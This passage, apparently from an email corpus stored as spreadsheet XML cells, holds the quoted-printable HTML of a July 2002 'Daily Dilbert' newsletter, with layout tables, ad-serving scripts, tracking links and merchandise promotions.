 &lt;br&gt;&lt;font size = 1&gt;&lt;br&gt;&lt;br&gt;&lt;a href = 'http://www.applytools.com' target = '_blank'&gt;ApplyLeads v3.2&lt;/a&gt; Commercial E-mail List Manager.&lt;br&gt;&lt;/font&gt;&lt;Br&gt;
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Your Daily Dilbert 07/11/2002
</t>
  </si>
  <si>
    <t xml:space="preserve">--8227487.1026384200908.JavaMail.root.umsan1
 Content-Type: text/plain; charset=ISO-8859-1
 Content-Transfer-Encoding: 7bit
 E-mail error
 You're subscribed to the HTML version of the Daily Dilbert,
 which shows the comic strip as a graphic, but your mail system
 either can't support HTML or is set up to remove HTML content. For
 more information, contact your Internet service provider or mail
 system administrator.
 To change to a plain text subscription, modify your account
 preferences at 
 http://www.dilbert.com/comics/dilbert/daily_dilbert/html/login.html
 The plain text option appears toward the bottom of the modification
 page.
 --8227487.1026384200908.JavaMail.root.umsan1
 Content-Type: text/html; charset=ISO-8859-1
 Content-Transfer-Encoding: quoted-printable
 &lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"&gt;
 &lt;HTML&gt;
 &lt;HEAD&gt;
 &lt;TITLE&gt;Daily Dilbert&lt;/TITLE&gt;
 &lt;meta http-equiv=3D"pragma" content=3D"no-cache"&gt;
 &lt;META HTTP-EQUIV=3D"expires" CONTENT=3D"0"&gt;
 &lt;meta http-equiv=3D"Cache-control" content=3D"no-cache"&gt;
 &lt;/HEAD&gt;
 &lt;BODY BGCOLOR=3D"#336699" text=3D"#000000" link=3D"#000000" vlink=3D"#00339=
 9" alink=3D"#3333CC" MARGINWIDTH=3D"0" MARGINHEIGHT=3D"8" LEFTMARGIN=3D"0" =
 TOPMARGIN=3D"8"&gt;
 &lt;TABLE WIDTH=3D"100%" BORDER=3D"0" CELLPADDING=3D"0" BGCOLOR=3D"#336699"&gt;
 &lt;TR&gt;
 &lt;TD BGCOLOR=3D"#336699" WIDTH=3D"15"&gt;&lt;IMG SRC=3D"http://www.comics.com/comi=
 cs/dilbert/images/clear_dot.gif" WIDTH=3D"15" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 &lt;TD BGCOLOR=3D"#336699"&gt;
 &lt;SCRIPT LANGUAGE=3D"JAVASCRIPT"&gt;
 &lt;!--=20
 function rand(n)=20
 {
 seed =3D (0x015a4e35 * seed) % 0xfffffff;
 return (seed &gt;&gt; 16) % n;
 }
 var now =3D new Date ();
 var seed =3D now.getTime() % 0xffffffff;
 var same =3D rand(1000);
 // End hiding script from old browsers --&gt;
 &lt;/SCRIPT&gt;
 &lt;SCRIPT Language=3D"JavaScript"&gt;
 &lt;!-- hide from old browsers
   var today =3D new Date()
 //--&gt;
 &lt;/SCRIPT&gt;
 &lt;!-- CONTENT AND SKYSCRAPER AD TABLE BEGIN --&gt;
 &lt;TABLE CELLPADDING=3D"0" CELLSPACING=3D"0" BORDER=3D"0"&gt;
 =09&lt;TR VALIGN=3D"TOP"&gt;=09
 =09=09&lt;TD BGCOLOR=3D"#336699"&gt;
 =09=09=09&lt;!-- AD TABLE BEGIN --&gt;
 =09=09=09&lt;TABLE WIDTH=3D"627" CELLPADDING=3D"0" CELLSPACING=3D"0" BORDER=3D=
 "0"&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;=09
 =09=09=09=09=09&lt;TD WIDTH=3D"468" BGCOLOR=3D"#336699"&gt;&lt;IMG SRC=3D"http://www=
 .comics.com/comics/dilbert/images/small_ad.gif" WIDTH=3D"20" HEIGHT=3D"11" =
 BORDER=3D"0" ALT=3D"Advertisement"&gt;&lt;BR&gt;&lt;IMG SRC=3D"http://www.comics.com/co=
 mics/dilbert/images/clear_dot.gif" WIDTH=3D"1" HEIGHT=3D"1" BORDER=3D"0" AL=
 T=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"21" BGCOLOR=3D"#336699" ROWSPAN=3D"2"&gt;&lt;IMG SRC=
 =3D"http://www.comics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"21"=
  HEIGHT=3D"72" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"120" BGCOLOR=3D"#336699"&gt;&lt;IMG SRC=3D"http://www=
 .comics.com/comics/dilbert/images/small_ad.gif" WIDTH=3D"20" HEIGHT=3D"11" =
 BORDER=3D"0" ALT=3D"Advertisement"&gt;&lt;BR&gt;&lt;IMG SRC=3D"http://www.comics.com/co=
 mics/dilbert/images/clear_dot.gif" WIDTH=3D"1" HEIGHT=3D"1" BORDER=3D"0" AL=
 T=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"18" BGCOLOR=3D"#336699" ROWSPAN=3D"2"&gt;&lt;IMG SRC=
 =3D"http://www.comics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"18"=
  HEIGHT=3D"72" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09=09
 =09=09=09=09
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;=09
 =09=09=09=09=09&lt;TD WIDTH=3D"468" BGCOLOR=3D"#336699"&gt;
 =09=09=09=09=09&lt;!-- BEGIN ENHANCED CREATIVE --&gt;
 =09=09=09=09=09&lt;SCRIPT LANGUAGE=3D"JavaScript"&gt;
 =09=09=09=09=09&lt;!--
 =09=09=09=09=09document.write ('&lt;TABLE WIDTH=3D"468" CELLSPACING=3D"0" CELL=
 PADDING=3D"0" BORDER=3D"0"&gt;&lt;TR VALIGN=3D"TOP"&gt;&lt;TD ALIGN=3D"LEFT"&gt;&lt;ILAYER ID=
 =3Dph1 VISIBILITY=3Dhidden width=3D"468" height=3D"60"&gt;&lt;/ILAYER&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;=
 /TABLE&gt;');
 =09=09=09=09=09document.write ('&lt;NOLAYER&gt;');
 =09=09=09=09=09document.write ('&lt;IFRAME SRC=3D"http://ad.doubleclick.net/ad=
 i/dilbert.email.com/email/;sz=3D468x60;ptile=3D1;ord=3D' + same + '?" name=
 =3D"frame1" width=3D"468" height=3D"60" frameborder=3D"no" border=3D"0" MAR=
 GINWIDTH=3D"0" MARGINHEIGHT=3D"0" SCROLLING=3D"no"&gt;');
 =09=09=09=09=09document.write ('&lt;A target=3D"_blank" HREF=3D"http://ummail4=
 .unitedmedia.com:80/Click?q=3D83-U-EXQYJblFYQ87Utu2A5pw0MpdRR"&gt;');
 =09=09=09=09=09document.write ('&lt;IMG SRC=3D"http://ad.doubleclick.net/ad/di=
 lbert.email.com/email/;abr=3D!ie;sz=3D468x60;ptile=3D1;ord=3D' + same + '?"=
  border=3D"0" WIDTH=3D"468" HEIGHT=3D"60"&gt;&lt;/A&gt;&lt;/IFRAME&gt;');
 =09=09=09=09=09document.write ('&lt;/NOLAYER&gt;');=20
 =09=09=09=09=09//--&gt;
 =09=09=09=09=09&lt;/SCRIPT&gt;
 =09=09=09=09=09&lt;NOSCRIPT&gt;
 =09=09=09=09=09&lt;A target=3D"_blank" HREF=3D"http://ummail4.unitedmedia.com:=
 80/Click?q=3Dad-_4KAQzEL45iENBiQhVIgwYJHk9RR"&gt;&lt;IMG SRC=3D"http://ad.doublec=
 lick.net/ad/dilbert.email.com/email/;abr=3D!ie;sz=3D468x60;ptile=3D1;ord=3D=
 1986839?" BORDER=3D"0" WIDTH=3D"468" HEIGHT=3D"60"&gt;&lt;/a&gt;
 =09=09=09=09=09&lt;/NOSCRIPT&gt;
 =09=09=09=09=09&lt;!-- END ENHANCED CREATIVE --&gt;&lt;/TD&gt;
 =09=09=09=09=09
 =09=09=09=09=09
 =09=09=09=09=09
 =09=09=09=09=09&lt;TD WIDTH=3D"120" BGCOLOR=3D"#336699"&gt;&lt;IMG SRC=3D"http://www=
 .comics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"1" HEIGHT=3D"1" B=
 ORDER=3D"0" ALT=3D""&gt;&lt;BR&gt;&lt;A target=3D"_blank" HREF=3D"http://ummail4.united=
 media.com:80/Click?q=3Dd7-wk2ZQLWOVTzWDgyRmNeof0glydRR"&gt;&lt;IMG SRC=3D"http://=
 www.comics.com/comics/dilbert/daily_dilbert/images/dilbert_tshirt_120x60.gi=
 f" WIDTH=3D"120" HEIGHT=3D"60" BORDER=3D"0" ALT=3D"Shop Dilbert"&gt;&lt;/A&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09=09
 =09=09=09=09
 =09=09=09=09
 =09=09=09=09
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"627" HEIGHT=3D"10" COLSPAN=3D"4"&gt;&lt;IMG SRC=3D"ht=
 tp://www.comics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"627" HEIG=
 HT=3D"10" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09&lt;/TABLE&gt;
 =09=09=09&lt;!-- AD TABLE END --&gt;
 =09=09=09
 =09=09=09&lt;!-- HEADER TABLE BEGIN --&gt;
 =09=09=09&lt;TABLE WIDTH=3D"627" CELLPADDING=3D"0" CELLSPACING=3D"0" BORDER=3D=
 "0"&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;=09
 =09=09=09=09=09&lt;TD WIDTH=3D"515" BGCOLOR=3D"#336699" ROWSPAN=3D"3"&gt;&lt;A targe=
 t=3D"_blank" HREF=3D"http://ummail4.unitedmedia.com:80/Click?q=3Dec-MHsXQVy=
 AAvXFulA1k5qtYj5uGdRR"&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/dai=
 ly_dilbert/images/daily_dilbert_header_left.gif" WIDTH=3D"515" HEIGHT=3D"76=
 " BORDER=3D"0" ALT=3D"Daily Dilbert"&gt;&lt;/A&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"90" BGCOLOR=3D"#336699"&gt;&lt;IMG SRC=3D"http://www.=
 comics.com/comics/dilbert/daily_dilbert/images/daily_dilbert_header_mid_top=
 .gif" WIDTH=3D"90" HEIGHT=3D"55" BORDER=3D"0" ALT=3D"Daily Dilbert"&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"5" BGCOLOR=3D"#336699" ROWSPAN=3D"3"&gt;&lt;IMG SRC=
 =3D"http://www.comics.com/comics/dilbert/daily_dilbert/images/daily_dilbert=
 _header_right.gif" WIDTH=3D"5" HEIGHT=3D"76" BORDER=3D"0" ALT=3D"Daily Dilb=
 ert"&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"17" ROWSPAN=3D"3"&gt;&lt;IMG SRC=3D"http://www.comics=
 .com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"17" HEIGHT=3D"10" BORDER=
 =3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09=09
 =09=09=09=09&lt;!-- ENTER DATE HERE --&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;=09
 =09=09=09=09=09&lt;TD WIDTH=3D"90" BGCOLOR=3D"#003366" HEIGHT=3D"13"&gt;&lt;FONT FAC=
 E=3D"helvetica, arial" SIZE=3D"1" COLOR=3D"#FFFFFF"&gt;&lt;B&gt;07/11/2002&lt;/B&gt;&lt;/FONT=
 &gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"90" BGCOLOR=3D"#336699"&gt;&lt;IMG SRC=3D"http://www.=
 comics.com/comics/dilbert/daily_dilbert/images/daily_dilbert_header_mid_bot=
 tom.gif" WIDTH=3D"90" HEIGHT=3D"8" BORDER=3D"0" ALT=3D"Daily Dilbert"&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09&lt;/TABLE&gt;
 =09=09=09&lt;!-- HEADER TABLE END --&gt;
 =09=09=09
 =09=09=09&lt;!-- WHITE LINE AND GREETING TABLE BEGIN --&gt;
 =09=09=09&lt;TABLE WIDTH=3D"627" CELLPADDING=3D"0" CELLSPACING=3D"0" BORDER=3D=
 "0"&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;=09
 =09=09=09=09=09&lt;TD WIDTH=3D"1" HEIGHT=3D"2" BGCOLOR=3D"#003366"&gt;&lt;IMG SRC=3D=
 "http://www.comics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"1" HEI=
 GHT=3D"2" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"605" HEIGHT=3D"2" BGCOLOR=3D"#FFFFFF" COLSPAN=
 =3D"2"&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/images/clear_dot.gi=
 f" WIDTH=3D"605" HEIGHT=3D"2" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"4" HEIGHT=3D"2" BGCOLOR=3D"#FFFFFF"&gt;&lt;IMG SRC=3D=
 "http://www.comics.com/comics/dilbert/daily_dilbert/images/white_line_right=
 .gif" WIDTH=3D"4" HEIGHT=3D"2" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"17" HEIGHT=3D"48" ROWSPAN=3D"4"&gt;&lt;IMG SRC=3D"htt=
 p://www.comics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"17" HEIGHT=
 =3D"48" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;=09
 =09=09=09=09=09&lt;TD WIDTH=3D"1" HEIGHT=3D"37" BGCOLOR=3D"#003366" ROWSPAN=3D=
 "2"&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/images/clear_dot.gif" =
 WIDTH=3D"1" HEIGHT=3D"39" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"605" HEIGHT=3D"5" BGCOLOR=3D"#FFCC66" COLSPAN=
 =3D"2"&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/images/clear_dot.gi=
 f" WIDTH=3D"605" HEIGHT=3D"7" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"4" HEIGHT=3D"37" BACKGROUND=3D"http://www.comic=
 s.com/comics/dilbert/daily_dilbert/images/ffcc66_right.gif" ROWSPAN=3D"2"&gt;&lt;=
 IMG SRC=3D"http://www.comics.com/comics/dilbert/images/clear_dot.gif" WIDTH=
 =3D"4" HEIGHT=3D"39" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"10" HEIGHT=3D"32" BGCOLOR=3D"#FFCC66"&gt;&lt;IMG SRC=
 =3D"http://www.comics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"10"=
  HEIGHT=3D"32" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"595" HEIGHT=3D"32" BGCOLOR=3D"#FFCC66"&gt;&lt;FONT FA=
 CE=3D"Arial,Verdana" SIZE=3D"1"&gt;Hi Justin, enjoy your daily comic from &lt;A t=
 arget=3D"_blank" HREF=3D"http://ummail4.unitedmedia.com:80/Click?q=3D41-qqz=
 1IEKJmGqbLLfU5MfcDpoJKdRR"&gt;Dilbert.com&lt;/A&gt;.&lt;BR&gt;&lt;B&gt;If you like the Daily Dil=
 bert, tell a friend! &lt;A target=3D"_blank" HREF=3D"http://ummail4.unitedmedi=
 a.com:80/Click?q=3D6b-8gGZIHEQwxe_OqB804wiNinZLsRR"&gt;Click here to send mail=
 &lt;/A&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"1" BGCOLOR=3D"#003366"&gt;&lt;IMG SRC=3D"http://www.c=
 omics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"1" HEIGHT=3D"7" BOR=
 DER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"605" BGCOLOR=3D"#FFFFFF" COLSPAN=3D"2"&gt;&lt;IMG SRC=
 =3D"http://www.comics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"605=
 " HEIGHT=3D"7" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"4" HEIGHT=3D"7" BACKGROUND=3D"http://www.comics=
 .com/comics/dilbert/daily_dilbert/images/ffffff_right.gif"&gt;&lt;IMG SRC=3D"http=
 ://www.comics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"4" BORDER=
 =3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09&lt;/TABLE&gt;
 =09=09=09&lt;!-- WHITE LINE AND GREETING TABLE END --&gt;
 =09=09=09
 =09=09=09&lt;!-- ONLINE STORE AND STRIP TABLE BEGIN --&gt;
 =09=09=09&lt;TABLE WIDTH=3D"627" CELLPADDING=3D"0" CELLSPACING=3D"0" BORDER=3D=
 "0"&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;=09
 =09=09=09=09=09&lt;TD WIDTH=3D"1" HEIGHT=3D"348" BGCOLOR=3D"#003366" ROWSPAN=
 =3D"6"&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/images/clear_dot.gi=
 f" WIDTH=3D"1" HEIGHT=3D"348" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"4" HEIGHT=3D"348" BGCOLOR=3D"#FFFFFF" ROWSPAN=
 =3D"6"&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/images/clear_dot.gi=
 f" WIDTH=3D"4" HEIGHT=3D"348" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"6" HEIGHT=3D"83" BGCOLOR=3D"#FFFFFF" ROWSPAN=3D=
 "5"&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/images/clear_dot.gif" =
 WIDTH=3D"6" HEIGHT=3D"83" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"585" HEIGHT=3D"19" BGCOLOR=3D"#FFFFFF" COLSPAN=
 =3D"7"&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/daily_dilbert/image=
 s/header_online_store.gif" WIDTH=3D"200" HEIGHT=3D"15" BORDER=3D"0" ALT=3D"=
 "&gt;&lt;BR&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/images/clear_dot.gif=
 " WIDTH=3D"4" HEIGHT=3D"4" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"9" HEIGHT=3D"83" BGCOLOR=3D"#FFFFFF" ROWSPAN=3D=
 "5"&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/images/clear_dot.gif" =
 WIDTH=3D"9" HEIGHT=3D"83" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"1" HEIGHT=3D"348" BGCOLOR=3D"#FFFFFF" ROWSPAN=
 =3D"6"&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/images/clear_dot.gi=
 f" WIDTH=3D"1" HEIGHT=3D"348" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"4" HEIGHT=3D"348" BACKGROUND=3D"http://www.comi=
 cs.com/comics/dilbert/daily_dilbert/images/white_line_right.gif" ROWSPAN=3D=
 "6"&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/images/clear_dot.gif" =
 WIDTH=3D"4" HEIGHT=3D"348" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"17" HEIGHT=3D"349" ROWSPAN=3D"7"&gt;&lt;IMG SRC=3D"ht=
 tp://www.comics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"17" HEIGH=
 T=3D"349" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"200" HEIGHT=3D"59" BGCOLOR=3D"#FFFFFF" ROWSPAN=
 =3D"2"&gt;&lt;FONT FACE=3D"Arial,Verdana" SIZE=3D"1"&gt;&lt;IMG SRC=3D"http://www.comic=
 s.com/comics/dilbert/daily_dilbert/images/books.gif" WIDTH=3D"35" HEIGHT=3D=
 "15" BORDER=3D"0" ALT=3D"Books"&gt;&lt;BR&gt;&lt;A target=3D"_blank" HREF=3D"http://umm=
 ail4.unitedmedia.com:80/Click?q=3Dbf-JtifQ8ZXsskdaDi5wLPtl2BVOdRR"&gt;&lt;IMG SRC=
 =3D"http://www.comics.com/comics/dilbert/ads/book_badge.gif" WIDTH=3D"169" =
 HEIGHT=3D"60" BORDER=3D"0" ALT=3D"Another Day in Cubicle Paradise"&gt;&lt;/A&gt;&lt;BR&gt;=
 &lt;BR&gt;Complete your collection while pretending to work!&lt;BR&gt;
 &lt;A target=3D"_blank" HREF=3D"http://ummail4.unitedmedia.com:80/Click?q=3De9=
 -gdJpQxVKOdGZL1hTRiUvW12MtsRR"&gt;&gt; Shop&lt;/A&gt;&lt;/FONT&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"10" HEIGHT=3D"59" BGCOLOR=3D"#FFFFFF" ROWSPAN=
 =3D"2"&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/images/clear_dot.gi=
 f" WIDTH=3D"10" HEIGHT=3D"7" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"83" HEIGHT=3D"59" BGCOLOR=3D"#FFFFFF" ROWSPAN=
 =3D"2"&gt;&lt;A target=3D"_blank" HREF=3D"http://ummail4.unitedmedia.com:80/Click=
 ?q=3Dfe-xkKgQwgyytuTBFgeEyr8OatO59RR"&gt;&lt;IMG SRC=3D"http://www.comics.com/com=
 ics/dilbert/daily_dilbert/images/thumb_dilbert_mints.gif" WIDTH=3D"83" HEIG=
 HT=3D"57" BORDER=3D"0" ALT=3D"Dilbert Mints"&gt;&lt;/A&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"120" HEIGHT=3D"59" BGCOLOR=3D"#FFFFFF" ROWSPAN=
 =3D"2"&gt;&lt;FONT FACE=3D"Arial,Verdana" SIZE=3D"1"&gt;&lt;IMG SRC=3D"http://www.comic=
 s.com/comics/dilbert/daily_dilbert/images/mints.gif" WIDTH=3D"35" HEIGHT=3D=
 "15" BORDER=3D"0" ALT=3D"Graphic (live connection required)"&gt;&lt;BR&gt;&lt;IMG SRC=
 =3D"http://www.comics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"120=
 " HEIGHT=3D"1" BORDER=3D"0" ALT=3D""&gt;&lt;BR&gt;They're character-shaped, in colle=
 ctible tins.&lt;BR&gt;&lt;B&gt;&amp;gt; &lt;A target=3D"_blank" HREF=3D"http://ummail4.unitedm=
 edia.com:80/Click?q=3D28-A2VXIRdtOBAz_FrELotGyr_prRRR"&gt;Shop&lt;/A&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;=
 /TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"10" HEIGHT=3D"59" BGCOLOR=3D"#FFFFFF" ROWSPAN=
 =3D"2"&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/images/clear_dot.gi=
 f" WIDTH=3D"10" HEIGHT=3D"10" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"162" HEIGHT=3D"24" BGCOLOR=3D"#FFFFFF" COLSPAN=
 =3D"2"&gt;&lt;FONT FACE=3D"Arial,Verdana" SIZE=3D"1"&gt;&lt;IMG SRC=3D"http://www.comic=
 s.com/comics/dilbert/daily_dilbert/images/clothing_and_posters.gif" WIDTH=
 =3D"121" HEIGHT=3D"15" BORDER=3D"0" ALT=3D""&gt;&lt;BR&gt;Get any Dilbert strip publ=
 ished in the last 90 days printed on a&lt;BR&gt;T-shirt, sweatshirt or poster. Se=
 lected older strips are also available.&lt;BR&gt;
 &lt;B&gt;&amp;gt; &lt;A target=3D"_blank" HREF=3D"http://ummail4.unitedmedia.com:80/Clic=
 k?q=3D3d-oi4NIbztihQBaSRvweGnZXdFXdRR"&gt;Shop&lt;/A&gt;&lt;/B&gt;&lt;BR&gt;
 &lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/images/clear_dot.gif" WIDT=
 H=3D"148" HEIGHT=3D"20" BORDER=3D"0" ALT=3D""&gt;&lt;/FONT&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;
 =09=09=09=09&lt;TD WIDTH=3D"14" HEIGHT=3D"35" BGCOLOR=3D"#FFFFFF"&gt;&lt;IMG SRC=3D"=
 http://www.comics.com/comics/dilbert/daily_dilbert/images/bullet.gif" WIDTH=
 =3D"14" HEIGHT=3D"11" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"148" HEIGHT=3D"35" BGCOLOR=3D"#FFFFFF"&gt;&lt;FONT FA=
 CE=3D"Arial,Verdana" SIZE=3D"1"&gt;&lt;A target=3D"_blank" HREF=3D"http://ummail4=
 .unitedmedia.com:80/Click?q=3D52-LUQoIrJ4zsGzUMFMW7859OXeQsRR"&gt;View all pro=
 ducts&lt;/A&gt;&lt;/FONT&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"585" HEIGHT=3D"5" BGCOLOR=3D"#FFFFFF" COLSPAN=
 =3D"7"&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/images/clear_dot.gi=
 f" WIDTH=3D"585" HEIGHT=3D"5" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09=09&lt;!-- COMIC STRIP HERE --&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;
                 &lt;TD ALIGN=3D"LEFT" BGCOLOR=3D"#FFFFFF"&gt;&lt;FONT face=3D"helvet=
 ica, arial" size=3D1&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/daily=
 _dilbert/images/bullet.gif" WIDTH=3D"14" HEIGHT=3D"11" ALT=3D"" BORDER=3D"0=
 "&gt;&lt;A target=3D"_blank" HREF=3D"http://ummail4.unitedmedia.com:80/Click?q=3D=
 68-iM-qIsPUhmZOIppywgjhJAlWP9RR"&gt;Modify Your Account&lt;/A&gt;/&lt;A target=3D"_blan=
 k" HREF=3D"http://ummail4.unitedmedia.com:80/Click?q=3D7d-FFBqIDLUd2OhNOZUy=
 tqS-9z3UdRR"&gt;Unsubscribe&lt;/A&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;TD ALIGN=3D"RIGHT" BGCOLOR=3D"#FFF=
 FFF" COLSPAN=3D"7"&gt;&lt;FONT FACE=3D"helvetica, arial" SIZE=3D"1"&gt;&lt;A target=3D"=
 _blank" HREF=3D"http://ummail4.unitedmedia.com:80/Click?q=3D92-ubiVQTzlt5I4=
 HCIzeuO078lfJRRR"&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/daily_di=
 lbert/images/bullet.gif" WIDTH=3D"14" HEIGHT=3D"11" ALT=3D"" BORDER=3D"0"&gt;B=
 uy This Strip&lt;/A&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;A HREF=3D"http://www.comics.com/webmail=
 /SendAStrip?AppName=3DSendAStrip&amp;ComicName=3D/comics/dilbert/&amp;Attachments=
 =3D/comics/dilbert/archive/images/dilbert2002261210711.gif&amp;EmailDate=3DJuly=
 -11-2002"&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/daily_dilbert/im=
 ages/bullet.gif" WIDTH=3D"14" HEIGHT=3D"11" ALT=3D"" BORDER=3D"0"&gt;Send This=
  Strip to a Friend&lt;/A&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;A target=3D"_blank" HREF=3D"http:/=
 /ummail4.unitedmedia.com:80/Click?q=3Da7-fRT2Q8ByDbUNvpILFOvKDvIrsdRR"&gt;&lt;IMG=
  SRC=3D"http://www.comics.com/comics/dilbert/daily_dilbert/images/bullet.gi=
